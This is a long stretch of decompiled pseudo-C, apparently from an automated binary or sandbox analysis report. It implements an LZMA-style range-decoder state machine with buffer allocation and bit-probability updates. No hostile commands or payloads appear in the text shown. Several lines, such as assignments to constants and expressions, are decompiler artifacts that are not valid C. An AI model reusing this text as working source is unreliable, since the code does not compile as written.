                                                                                                                                                              							__eflags = _v12;
                                                                                                                                                              							_v120 = _t550;
                                                                                                                                                              							if(_v12 != 0) {
                                                                                                                                                              								GlobalFree(_v12); // executed
                                                                                                                                                              							}
                                                                                                                                                              							_t537 = GlobalAlloc(0x40, _v68); // executed
                                                                                                                                                              							__eflags = _t537;
                                                                                                                                                              							_v12 = _t537;
                                                                                                                                                              							if(_t537 == 0) {
                                                                                                                                                              								goto L174;
                                                                                                                                                              							} else {
                                                                                                                                                              								goto L22;
                                                                                                                                                              							}
                                                                                                                                                              						case 2:
                                                                                                                                                              							L26:
                                                                                                                                                              							_t557 = _v100 & _v32;
                                                                                                                                                              							_v136 = 6;
                                                                                                                                                              							_v80 = _t557;
                                                                                                                                                              							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
                                                                                                                                                              							goto L135;
                                                                                                                                                              						case 3:
                                                                                                                                                              							L23:
                                                                                                                                                              							__eflags = _v112;
                                                                                                                                                              							if(_v112 == 0) {
                                                                                                                                                              								_v140 = 3;
                                                                                                                                                              								goto L173;
                                                                                                                                                              							}
                                                                                                                                                              							_v112 = _v112 - 1;
                                                                                                                                                              							_t72 =  &_v116;
                                                                                                                                                              							 *_t72 = _v116 + 1;
                                                                                                                                                              							__eflags =  *_t72;
                                                                                                                                                              							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                              							L25:
                                                                                                                                                              							_v76 = _v76 - 1;
                                                                                                                                                              							__eflags = _v76;
                                                                                                                                                              							if(_v76 != 0) {
                                                                                                                                                              								goto L23;
                                                                                                                                                              							}
                                                                                                                                                              							goto L26;
                                                                                                                                                              						case 4:
                                                                                                                                                              							L136:
                                                                                                                                                              							_t559 =  *_t626;
                                                                                                                                                              							_t610 = _t559 & 0x0000ffff;
                                                                                                                                                              							_t591 = (_v20 >> 0xb) * _t610;
                                                                                                                                                              							__eflags = _v16 - _t591;
                                                                                                                                                              							if(_v16 >= _t591) {
                                                                                                                                                              								_v20 = _v20 - _t591;
                                                                                                                                                              								_v16 = _v16 - _t591;
                                                                                                                                                              								_v68 = 1;
                                                                                                                                                              								_t560 = _t559 - (_t559 >> 5);
                                                                                                                                                              								__eflags = _t560;
                                                                                                                                                              								 *_t626 = _t560;
                                                                                                                                                              							} else {
                                                                                                                                                              								_v20 = _t591;
                                                                                                                                                              								_v68 = _v68 & 0x00000000;
                                                                                                                                                              								 *_t626 = (0x800 - _t610 >> 5) + _t559;
                                                                                                                                                              							}
                                                                                                                                                              							__eflags = _v20 - 0x1000000;
                                                                                                                                                              							if(_v20 >= 0x1000000) {
                                                                                                                                                              								goto L142;
                                                                                                                                                              							} else {
                                                                                                                                                              								goto L140;
                                                                                                                                                              							}
                                                                                                                                                              						case 5:
                                                                                                                                                              							L140:
                                                                                                                                                              							__eflags = _v112;
                                                                                                                                                              							if(_v112 == 0) {
                                                                                                                                                              								_v140 = 5;
                                                                                                                                                              								goto L173;
                                                                                                                                                              							}
                                                                                                                                                              							_v20 = _v20 << 8;
                                                                                                                                                              							_v112 = _v112 - 1;
                                                                                                                                                              							_t464 =  &_v116;
                                                                                                                                                              							 *_t464 = _v116 + 1;
                                                                                                                                                              							__eflags =  *_t464;
                                                                                                                                                              							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                              							L142:
                                                                                                                                                              							_t561 = _v136;
                                                                                                                                                              							goto L143;
                                                                                                                                                              						case 6:
                                                                                                                                                              							__edx = 0;
                                                                                                                                                              							__eflags = _v68;
                                                                                                                                                              							if(_v68 != 0) {
                                                                                                                                                              								__eax = _v8;
                                                                                                                                                              								__ecx = _v60;
                                                                                                                                                              								_v56 = 1;
                                                                                                                                                              								_v136 = 7;
                                                                                                                                                              								__esi = _v8 + 0x180 + _v60 * 2;
                                                                                                                                                              								goto L135;
                                                                                                                                                              							}
                                                                                                                                                              							__eax = _v96 & 0x000000ff;
                                                                                                                                                              							__esi = _v100;
                                                                                                                                                              							__cl = 8;
                                                                                                                                                              							__cl = 8 - _v64;
                                                                                                                                                              							__esi = _v100 & _v28;
                                                                                                                                                              							__eax = (_v96 & 0x000000ff) >> 8;
                                                                                                                                                              							__ecx = _v64;
                                                                                                                                                              							__esi = (_v100 & _v28) << 8;
                                                                                                                                                              							__ecx = _v8;
                                                                                                                                                              							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
                                                                                                                                                              							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
                                                                                                                                                              							__eflags = _v60 - 4;
                                                                                                                                                              							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                                                                                                                              							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                                                                                                                              							if(_v60 >= 4) {
                                                                                                                                                              								__eflags = _v60 - 0xa;
                                                                                                                                                              								if(_v60 >= 0xa) {
                                                                                                                                                              									_t103 =  &_v60;
                                                                                                                                                              									 *_t103 = _v60 - 6;
                                                                                                                                                              									__eflags =  *_t103;
                                                                                                                                                              								} else {
                                                                                                                                                              									_v60 = _v60 - 3;
                                                                                                                                                              								}
                                                                                                                                                              							} else {
                                                                                                                                                              								_v60 = 0;
                                                                                                                                                              							}
                                                                                                                                                              							__eflags = _v56 - __edx;
                                                                                                                                                              							if(_v56 == __edx) {
                                                                                                                                                              								__ebx = 0;
                                                                                                                                                              								__ebx = 1;
                                                                                                                                                              								goto L63;
                                                                                                                                                              							}
                                                                                                                                                              							__eax = _v24;
                                                                                                                                                              							__eax = _v24 - _v48;
                                                                                                                                                              							__eflags = __eax - _v120;
                                                                                                                                                              							if(__eax >= _v120) {
                                                                                                                                                              								__eax = __eax + _v120;
                                                                                                                                                              								__eflags = __eax;
                                                                                                                                                              							}
                                                                                                                                                              							__ecx = _v12;
                                                                                                                                                              							__ebx = 0;
                                                                                                                                                              							__ebx = 1;
                                                                                                                                                              							__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                              							_v95 =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                              							goto L43;
                                                                                                                                                              						case 7:
                                                                                                                                                              							__eflags = _v68 - 1;
                                                                                                                                                              							if(_v68 != 1) {
                                                                                                                                                              								__eax = _v40;
                                                                                                                                                              								_v132 = 0x16;
                                                                                                                                                              								_v36 = _v40;
                                                                                                                                                              								__eax = _v44;
                                                                                                                                                              								_v40 = _v44;
                                                                                                                                                              								__eax = _v48;
                                                                                                                                                              								_v44 = _v48;
                                                                                                                                                              								__eax = 0;
                                                                                                                                                              								__eflags = _v60 - 7;
                                                                                                                                                              								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                              								__al = __al & 0x000000fd;
                                                                                                                                                              								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                              								_v60 = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                              								__eax = _v8;
                                                                                                                                                              								__eax = _v8 + 0x664;
                                                                                                                                                              								__eflags = __eax;
                                                                                                                                                              								_v92 = __eax;
                                                                                                                                                              								goto L71;
                                                                                                                                                              							}
                                                                                                                                                              							__eax = _v8;
                                                                                                                                                              							__ecx = _v60;
                                                                                                                                                              							_v136 = 8;
                                                                                                                                                              							__esi = _v8 + 0x198 + _v60 * 2;
                                                                                                                                                              							goto L135;
                                                                                                                                                              						case 8:
                                                                                                                                                              							__eflags = _v68;
                                                                                                                                                              							if(_v68 != 0) {
                                                                                                                                                              								__eax = _v8;
                                                                                                                                                              								__ecx = _v60;
                                                                                                                                                              								_v136 = 0xa;
                                                                                                                                                              								__esi = _v8 + 0x1b0 + _v60 * 2;
                                                                                                                                                              							} else {
                                                                                                                                                              								__eax = _v60;
                                                                                                                                                              								__ecx = _v8;
                                                                                                                                                              								__eax = _v60 + 0xf;
                                                                                                                                                              								_v136 = 9;
                                                                                                                                                              								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
                                                                                                                                                              								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
                                                                                                                                                              							}
                                                                                                                                                              							goto L135;
                                                                                                                                                              						case 9:
                                                                                                                                                              							__eflags = _v68;
                                                                                                                                                              							if(_v68 != 0) {
                                                                                                                                                              								goto L92;
                                                                                                                                                              							}
                                                                                                                                                              							__eflags = _v100;
                                                                                                                                                              							if(_v100 == 0) {
                                                                                                                                                              								goto L174;
                                                                                                                                                              							}
                                                                                                                                                              							__eax = 0;
                                                                                                                                                              							__eflags = _v60 - 7;
                                                                                                                                                              							_t264 = _v60 - 7 >= 0;
                                                                                                                                                              							__eflags = _t264;
                                                                                                                                                              							0 | _t264 = _t264 + _t264 + 9;
                                                                                                                                                              							_v60 = _t264 + _t264 + 9;
                                                                                                                                                              							goto L78;
                                                                                                                                                              						case 0xa:
                                                                                                                                                              							__eflags = _v68;
                                                                                                                                                              							if(_v68 != 0) {
                                                                                                                                                              								__eax = _v8;
                                                                                                                                                              								__ecx = _v60;
                                                                                                                                                              								_v136 = 0xb;
                                                                                                                                                              								__esi = _v8 + 0x1c8 + _v60 * 2;
                                                                                                                                                              								goto L135;
                                                                                                                                                              							}
                                                                                                                                                              							__eax = _v44;
                                                                                                                                                              							goto L91;
                                                                                                                                                              						case 0xb:
                                                                                                                                                              							__eflags = _v68;
                                                                                                                                                              							if(_v68 != 0) {
                                                                                                                                                              								__ecx = _v40;
                                                                                                                                                              								__eax = _v36;
                                                                                                                                                              								_v36 = _v40;
                                                                                                                                                              							} else {
                                                                                                                                                              								__eax = _v40;
                                                                                                                                                              							}
                                                                                                                                                              							__ecx = _v44;
                                                                                                                                                              							_v40 = _v44;
                                                                                                                                                              							L91:
                                                                                                                                                              							__ecx = _v48;
                                                                                                                                                              							_v48 = __eax;
                                                                                                                                                              							_v44 = _v48;
                                                                                                                                                              							L92:
                                                                                                                                                              							__eax = _v8;
                                                                                                                                                              							_v132 = 0x15;
                                                                                                                                                              							__eax = _v8 + 0xa68;
                                                                                                                                                              							_v92 = _v8 + 0xa68;
                                                                                                                                                              							goto L71;
                                                                                                                                                              						case 0xc:
                                                                                                                                                              							L102:
                                                                                                                                                              							__eflags = _v112;
                                                                                                                                                              							if(_v112 == 0) {
                                                                                                                                                              								_v140 = 0xc;
                                                                                                                                                              								goto L173;
                                                                                                                                                              							}
                                                                                                                                                              							__ecx = _v116;
                                                                                                                                                              							__eax = _v16;
                                                                                                                                                              							_v20 = _v20 << 8;
                                                                                                                                                              							__ecx =  *_v116 & 0x000000ff;
                                                                                                                                                              							_v112 = _v112 - 1;
                                                                                                                                                              							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                              							_t340 =  &_v116;
                                                                                                                                                              							 *_t340 = _v116 + 1;
                                                                                                                                                              							__eflags =  *_t340;
                                                                                                                                                              							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                              							__eax = _v48;
                                                                                                                                                              							goto L104;
                                                                                                                                                              						case 0xd:
                                                                                                                                                              							L39:
                                                                                                                                                              							__eflags = _v112;
                                                                                                                                                              							if(_v112 == 0) {
                                                                                                                                                              								_v140 = 0xd;
                                                                                                                                                              								goto L173;
                                                                                                                                                              							}
                                                                                                                                                              							__ecx = _v116;
                                                                                                                                                              							__eax = _v16;
                                                                                                                                                              							_v20 = _v20 << 8;
                                                                                                                                                              							__ecx =  *_v116 & 0x000000ff;
                                                                                                                                                              							_v112 = _v112 - 1;
                                                                                                                                                              							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                              							_t127 =  &_v116;
                                                                                                                                                              							 *_t127 = _v116 + 1;
                                                                                                                                                              							__eflags =  *_t127;
                                                                                                                                                              							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                              							L41:
                                                                                                                                                              							__eax = _v68;
                                                                                                                                                              							__eflags = _v76 - _v68;
                                                                                                                                                              							if(_v76 != _v68) {
                                                                                                                                                              								goto L50;
                                                                                                                                                              							}
                                                                                                                                                              							__eflags = __ebx - 0x100;
                                                                                                                                                              							if(__ebx >= 0x100) {
                                                                                                                                                              								goto L56;
                                                                                                                                                              							}
                                                                                                                                                              							L43:
                                                                                                                                                              							__eax = _v95 & 0x000000ff;
                                                                                                                                                              							_v95 = _v95 << 1;
                                                                                                                                                              							__ecx = _v92;
                                                                                                                                                              							__eax = (_v95 & 0x000000ff) >> 7;
                                                                                                                                                              							_v76 = __eax;
                                                                                                                                                              							__eax = __eax + 1;
                                                                                                                                                              							__eax = __eax << 8;
                                                                                                                                                              							__eax = __eax + __ebx;
                                                                                                                                                              							__esi = _v92 + __eax * 2;
                                                                                                                                                              							_v20 = _v20 >> 0xb;
                                                                                                                                                              							__ax =  *__esi;
                                                                                                                                                              							_v88 = __esi;
                                                                                                                                                              							__edx = __ax & 0x0000ffff;
                                                                                                                                                              							__ecx = (_v20 >> 0xb) * __edx;
                                                                                                                                                              							__eflags = _v16 - __ecx;
                                                                                                                                                              							if(_v16 >= __ecx) {
                                                                                                                                                              								_v20 = _v20 - __ecx;
                                                                                                                                                              								_v16 = _v16 - __ecx;
                                                                                                                                                              								__cx = __ax;
                                                                                                                                                              								_v68 = 1;
                                                                                                                                                              								__cx = __ax >> 5;
                                                                                                                                                              								__eflags = __eax;
                                                                                                                                                              								__ebx = __ebx + __ebx + 1;
                                                                                                                                                              								 *__esi = __ax;
                                                                                                                                                              							} else {
                                                                                                                                                              								_v68 = _v68 & 0x00000000;
                                                                                                                                                              								_v20 = __ecx;
                                                                                                                                                              								0x800 = 0x800 - __edx;
                                                                                                                                                              								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                                                              								__ebx = __ebx + __ebx;
                                                                                                                                                              								 *__esi = __cx;
                                                                                                                                                              							}
                                                                                                                                                              							__eflags = _v20 - 0x1000000;
                                                                                                                                                              							_v72 = __ebx;
                                                                                                                                                              							if(_v20 >= 0x1000000) {
                                                                                                                                                              								goto L41;
                                                                                                                                                              							} else {
                                                                                                                                                              								goto L39;
                                                                                                                                                              							}
                                                                                                                                                              						case 0xe:
                                                                                                                                                              							L48:
                                                                                                                                                              							__eflags = _v112;
                                                                                                                                                              							if(_v112 == 0) {
                                                                                                                                                              								_v140 = 0xe;
                                                                                                                                                              								goto L173;
                                                                                                                                                              							}
                                                                                                                                                              							__ecx = _v116;
                                                                                                                                                              							__eax = _v16;
                                                                                                                                                              							_v20 = _v20 << 8;
                                                                                                                                                              							__ecx =  *_v116 & 0x000000ff;
                                                                                                                                                              							_v112 = _v112 - 1;
                                                                                                                                                              							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                              							_t161 =  &_v116;
                                                                                                                                                              							 *_t161 = _v116 + 1;
                                                                                                                                                              							__eflags =  *_t161;
                                                                                                                                                              							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                              							while(1) {
                                                                                                                                                              								L50:
                                                                                                                                                              								__eflags = __ebx - 0x100;
                                                                                                                                                              								if(__ebx >= 0x100) {
                                                                                                                                                              									break;
                                                                                                                                                              								}
                                                                                                                                                              								__eax = _v92;
                                                                                                                                                              								__edx = __ebx + __ebx;
                                                                                                                                                              								__ecx = _v20;
                                                                                                                                                              								__esi = __edx + __eax;
                                                                                                                                                              								__ecx = _v20 >> 0xb;
                                                                                                                                                              								__ax =  *__esi;
                                                                                                                                                              								_v88 = __esi;
                                                                                                                                                              								__edi = __ax & 0x0000ffff;
                                                                                                                                                              								__ecx = (_v20 >> 0xb) * __edi;
                                                                                                                                                              								__eflags = _v16 - __ecx;
                                                                                                                                                              								if(_v16 >= __ecx) {
                                                                                                                                                              									_v20 = _v20 - __ecx;
                                                                                                                                                              									_v16 = _v16 - __ecx;
                                                                                                                                                              									__cx = __ax;
                                                                                                                                                              									_t175 = __edx + 1; // 0x1
                                                                                                                                                              									__ebx = _t175;
                                                                                                                                                              									__cx = __ax >> 5;
                                                                                                                                                              									__eflags = __eax;
                                                                                                                                                              									 *__esi = __ax;
                                                                                                                                                              								} else {
                                                                                                                                                              									_v20 = __ecx;
                                                                                                                                                              									0x800 = 0x800 - __edi;
                                                                                                                                                              									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                              									__ebx = __ebx + __ebx;
                                                                                                                                                              									 *__esi = __cx;
                                                                                                                                                              								}
                                                                                                                                                              								__eflags = _v20 - 0x1000000;
                                                                                                                                                              								_v72 = __ebx;
                                                                                                                                                              								if(_v20 >= 0x1000000) {
                                                                                                                                                              									continue;
                                                                                                                                                              								} else {
                                                                                                                                                              									goto L48;
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              							L56:
                                                                                                                                                              							_t178 =  &_v56;
                                                                                                                                                              							 *_t178 = _v56 & 0x00000000;
                                                                                                                                                              							__eflags =  *_t178;
                                                                                                                                                              							goto L57;
                                                                                                                                                              						case 0xf:
                                                                                                                                                              							L60:
                                                                                                                                                              							__eflags = _v112;
                                                                                                                                                              							if(_v112 == 0) {
                                                                                                                                                              								_v140 = 0xf;
                                                                                                                                                              								goto L173;
                                                                                                                                                              							}
                                                                                                                                                              							__ecx = _v116;
                                                                                                                                                              							__eax = _v16;
                                                                                                                                                              							_v20 = _v20 << 8;
                                                                                                                                                              							__ecx =  *_v116 & 0x000000ff;
                                                                                                                                                              							_v112 = _v112 - 1;
                                                                                                                                                              							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                              							_t208 =  &_v116;
                                                                                                                                                              							 *_t208 = _v116 + 1;
                                                                                                                                                              							__eflags =  *_t208;
                                                                                                                                                              							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                              							L62:
                                                                                                                                                              							__eflags = __ebx - 0x100;
                                                                                                                                                              							if(__ebx >= 0x100) {
                                                                                                                                                              								L57:
                                                                                                                                                              								__al = _v72;
                                                                                                                                                              								_v96 = _v72;
                                                                                                                                                              								goto L58;
                                                                                                                                                              							}
                                                                                                                                                              							L63:
                                                                                                                                                              							__eax = _v92;
                                                                                                                                                              							__edx = __ebx + __ebx;
                                                                                                                                                              							__ecx = _v20;
                                                                                                                                                              							__esi = __edx + __eax;
                                                                                                                                                              							__ecx = _v20 >> 0xb;
                                                                                                                                                              							__ax =  *__esi;
                                                                                                                                                              							_v88 = __esi;
                                                                                                                                                              							__edi = __ax & 0x0000ffff;
                                                                                                                                                              							__ecx = (_v20 >> 0xb) * __edi;
                                                                                                                                                              							__eflags = _v16 - __ecx;
                                                                                                                                                              							if(_v16 >= __ecx) {
                                                                                                                                                              								_v20 = _v20 - __ecx;
                                                                                                                                                              								_v16 = _v16 - __ecx;
                                                                                                                                                              								__cx = __ax;
                                                                                                                                                              								_t222 = __edx + 1; // 0x1
                                                                                                                                                              								__ebx = _t222;
                                                                                                                                                              								__cx = __ax >> 5;
                                                                                                                                                              								__eflags = __eax;
                                                                                                                                                              								 *__esi = __ax;
                                                                                                                                                              							} else {
                                                                                                                                                              								_v20 = __ecx;
                                                                                                                                                              								0x800 = 0x800 - __edi;
                                                                                                                                                              								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                              								__ebx = __ebx + __ebx;
                                                                                                                                                              								 *__esi = __cx;
                                                                                                                                                              							}
                                                                                                                                                              							__eflags = _v20 - 0x1000000;
                                                                                                                                                              							_v72 = __ebx;
                                                                                                                                                              							if(_v20 >= 0x1000000) {
                                                                                                                                                              								goto L62;
                                                                                                                                                              							} else {
                                                                                                                                                              								goto L60;
                                                                                                                                                              							}
                                                                                                                                                              						case 0x10:
                                                                                                                                                              							L112:
                                                                                                                                                              							__eflags = _v112;
                                                                                                                                                              							if(_v112 == 0) {
                                                                                                                                                              								_v140 = 0x10;
                                                                                                                                                              								goto L173;
                                                                                                                                                              							}
                                                                                                                                                              							__ecx = _v116;
                                                                                                                                                              							__eax = _v16;
                                                                                                                                                              							_v20 = _v20 << 8;
                                                                                                                                                              							__ecx =  *_v116 & 0x000000ff;
                                                                                                                                                              							_v112 = _v112 - 1;
                                                                                                                                                              							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                              							_t371 =  &_v116;
                                                                                                                                                              							 *_t371 = _v116 + 1;
                                                                                                                                                              							__eflags =  *_t371;
                                                                                                                                                              							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                              							goto L114;
                                                                                                                                                              						case 0x11:
                                                                                                                                                              							L71:
                                                                                                                                                              							__esi = _v92;
                                                                                                                                                              							_v136 = 0x12;
                                                                                                                                                              							goto L135;
                                                                                                                                                              						case 0x12:
                                                                                                                                                              							__eflags = _v68;
                                                                                                                                                              							if(_v68 != 0) {
                                                                                                                                                              								__eax = _v92;
                                                                                                                                                              								_v136 = 0x13;
                                                                                                                                                              								__esi = _v92 + 2;
                                                                                                                                                              								L135:
                                                                                                                                                              								_v88 = _t626;
                                                                                                                                                              								goto L136;
                                                                                                                                                              							}
                                                                                                                                                              							__eax = _v80;
                                                                                                                                                              							_v52 = _v52 & 0x00000000;
                                                                                                                                                              							__ecx = _v92;
                                                                                                                                                              							__eax = _v80 << 4;
                                                                                                                                                              							__eflags = __eax;
                                                                                                                                                              							__eax = _v92 + __eax + 4;
                                                                                                                                                              							goto L133;
                                                                                                                                                              						case 0x13:
                                                                                                                                                              							__eflags = _v68;
                                                                                                                                                              							if(_v68 != 0) {
                                                                                                                                                              								_t475 =  &_v92;
                                                                                                                                                              								 *_t475 = _v92 + 0x204;
                                                                                                                                                              								__eflags =  *_t475;
                                                                                                                                                              								_v52 = 0x10;
                                                                                                                                                              								_v68 = 8;
                                                                                                                                                              								L147:
                                                                                                                                                              								_v128 = 0x14;
                                                                                                                                                              								goto L148;
                                                                                                                                                              							}
                                                                                                                                                              							__eax = _v80;
                                                                                                                                                              							__ecx = _v92;
                                                                                                                                                              							__eax = _v80 << 4;
                                                                                                                                                              							_v52 = 8;
                                                                                                                                                              							__eax = _v92 + (_v80 << 4) + 0x104;
                                                                                                                                                              							L133:
                                                                                                                                                              							_v92 = __eax;
                                                                                                                                                              							_v68 = 3;
                                                                                                                                                              							goto L147;
                                                                                                                                                              						case 0x14:
                                                                                                                                                              							_v52 = _v52 + __ebx;
                                                                                                                                                              							__eax = _v132;
                                                                                                                                                              							goto L143;
                                                                                                                                                              						case 0x15:
                                                                                                                                                              							__eax = 0;
                                                                                                                                                              							__eflags = _v60 - 7;
                                                                                                                                                              							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                              							__al = __al & 0x000000fd;
                                                                                                                                                              							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                              							_v60 = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                              							goto L123;
                                                                                                                                                              						case 0x16:
                                                                                                                                                              							__eax = _v52;
                                                                                                                                                              							__eflags = __eax - 4;
                                                                                                                                                              							if(__eax >= 4) {
                                                                                                                                                              								_push(3);
                                                                                                                                                              								_pop(__eax);
                                                                                                                                                              							}
                                                                                                                                                              							__ecx = _v8;
                                                                                                                                                              							_v68 = 6;
                                                                                                                                                              							__eax = __eax << 7;
                                                                                                                                                              							_v128 = 0x19;
                                                                                                                                                              							_v92 = __eax;
                                                                                                                                                              							goto L148;
                                                                                                                                                              						case 0x17:
                                                                                                                                                              							L148:
                                                                                                                                                              							__eax = _v68;
                                                                                                                                                              							_v84 = 1;
                                                                                                                                                              							_v76 = _v68;
                                                                                                                                                              							goto L152;
                                                                                                                                                              						case 0x18:
                                                                                                                                                              							L149:
                                                                                                                                                              							__eflags = _v112;
                                                                                                                                                              							if(_v112 == 0) {
                                                                                                                                                              								_v140 = 0x18;
                                                                                                                                                              								goto L173;
                                                                                                                                                              							}
                                                                                                                                                              							__ecx = _v116;
                                                                                                                                                              							__eax = _v16;
                                                                                                                                                              							_v20 = _v20 << 8;
                                                                                                                                                              							__ecx =  *_v116 & 0x000000ff;
                                                                                                                                                              							_v112 = _v112 - 1;
                                                                                                                                                              							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                              							_t490 =  &_v116;
                                                                                                                                                              							 *_t490 = _v116 + 1;
                                                                                                                                                              							__eflags =  *_t490;
                                                                                                                                                              							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                              							L151:
                                                                                                                                                              							_t493 =  &_v76;
                                                                                                                                                              							 *_t493 = _v76 - 1;
                                                                                                                                                              							__eflags =  *_t493;
                                                                                                                                                              							L152:
                                                                                                                                                              							__eflags = _v76;
                                                                                                                                                              							if(_v76 <= 0) {
                                                                                                                                                              								__ecx = _v68;
                                                                                                                                                              								__ebx = _v84;
                                                                                                                                                              								0 = 1;
                                                                                                                                                              								__eax = 1 << __cl;
                                                                                                                                                              								__ebx = _v84 - (1 << __cl);
                                                                                                                                                              								__eax = _v128;
                                                                                                                                                              								_v72 = __ebx;
                                                                                                                                                              								L143:
                                                                                                                                                              								_v140 = _t561;
                                                                                                                                                              								goto L3;
                                                                                                                                                              							}
                                                                                                                                                              							__eax = _v84;
                                                                                                                                                              							_v20 = _v20 >> 0xb;
                                                                                                                                                              							__edx = _v84 + _v84;
                                                                                                                                                              							__eax = _v92;
                                                                                                                                                              							__esi = __edx + __eax;
                                                                                                                                                              							_v88 = __esi;
                                                                                                                                                              							__ax =  *__esi;
                                                                                                                                                              							__edi = __ax & 0x0000ffff;
                                                                                                                                                              							__ecx = (_v20 >> 0xb) * __edi;
                                                                                                                                                              							__eflags = _v16 - __ecx;
                                                                                                                                                              							if(_v16 >= __ecx) {
                                                                                                                                                              								_v20 = _v20 - __ecx;
                                                                                                                                                              								_v16 = _v16 - __ecx;
                                                                                                                                                              								__cx = __ax;
                                                                                                                                                              								__cx = __ax >> 5;
                                                                                                                                                              								__eax = __eax - __ecx;
                                                                                                                                                              								__edx = __edx + 1;
                                                                                                                                                              								__eflags = __edx;
                                                                                                                                                              								 *__esi = __ax;
                                                                                                                                                              								_v84 = __edx;
                                                                                                                                                              							} else {
                                                                                                                                                              								_v20 = __ecx;
                                                                                                                                                              								0x800 = 0x800 - __edi;
                                                                                                                                                              								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                              								_v84 = _v84 << 1;
                                                                                                                                                              								 *__esi = __cx;
                                                                                                                                                              							}
                                                                                                                                                              							__eflags = _v20 - 0x1000000;
                                                                                                                                                              							if(_v20 >= 0x1000000) {
                                                                                                                                                              								goto L151;
                                                                                                                                                              							} else {
                                                                                                                                                              								goto L149;
                                                                                                                                                              							}
                                                                                                                                                              						case 0x19:
                                                                                                                                                              							__eflags = __ebx - 4;
                                                                                                                                                              							if(__ebx < 4) {
                                                                                                                                                              								_v48 = __ebx;
                                                                                                                                                              								L122:
                                                                                                                                                              								_t399 =  &_v48;
                                                                                                                                                              								 *_t399 = _v48 + 1;
                                                                                                                                                              								__eflags =  *_t399;
                                                                                                                                                              								L123:
                                                                                                                                                              								__eax = _v48;
                                                                                                                                                              								__eflags = __eax;
                                                                                                                                                              								if(__eax == 0) {
                                                                                                                                                              									_v52 = _v52 | 0xffffffff;
                                                                                                                                                              									goto L173;
                                                                                                                                                              								}
                                                                                                                                                              								__eflags = __eax - _v100;
                                                                                                                                                              								if(__eax > _v100) {
                                                                                                                                                              									goto L174;
                                                                                                                                                              								}
                                                                                                                                                              								_v52 = _v52 + 2;
                                                                                                                                                              								__eax = _v52;
                                                                                                                                                              								_t406 =  &_v100;
                                                                                                                                                              								 *_t406 = _v100 + _v52;
                                                                                                                                                              								__eflags =  *_t406;
                                                                                                                                                              								goto L126;
                                                                                                                                                              							}
                                                                                                                                                              							__ecx = __ebx;
                                                                                                                                                              							__eax = __ebx;
                                                                                                                                                              							__ecx = __ebx >> 1;
                                                                                                                                                              							__eax = __ebx & 0x00000001;
                                                                                                                                                              							__ecx = (__ebx >> 1) - 1;
                                                                                                                                                              							__al = __al | 0x00000002;
                                                                                                                                                              							__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                                                              							__eflags = __ebx - 0xe;
                                                                                                                                                              							_v48 = __eax;
                                                                                                                                                              							if(__ebx >= 0xe) {
                                                                                                                                                              								__ebx = 0;
                                                                                                                                                              								_v76 = __ecx;
                                                                                                                                                              								L105:
                                                                                                                                                              								__eflags = _v76;
                                                                                                                                                              								if(_v76 <= 0) {
                                                                                                                                                              									__eax = __eax + __ebx;
                                                                                                                                                              									_v68 = 4;
                                                                                                                                                              									_v48 = __eax;
                                                                                                                                                              									__eax = _v8;
                                                                                                                                                              									__eax = _v8 + 0x644;
                                                                                                                                                              									__eflags = __eax;
                                                                                                                                                              									L111:
                                                                                                                                                              									__ebx = 0;
                                                                                                                                                              									_v92 = __eax;
                                                                                                                                                              									_v84 = 1;
                                                                                                                                                              									_v72 = 0;
                                                                                                                                                              									_v76 = 0;
                                                                                                                                                              									L115:
                                                                                                                                                              									__eax = _v68;
                                                                                                                                                              									__eflags = _v76 - _v68;
                                                                                                                                                              									if(_v76 >= _v68) {
                                                                                                                                                              										_t397 =  &_v48;
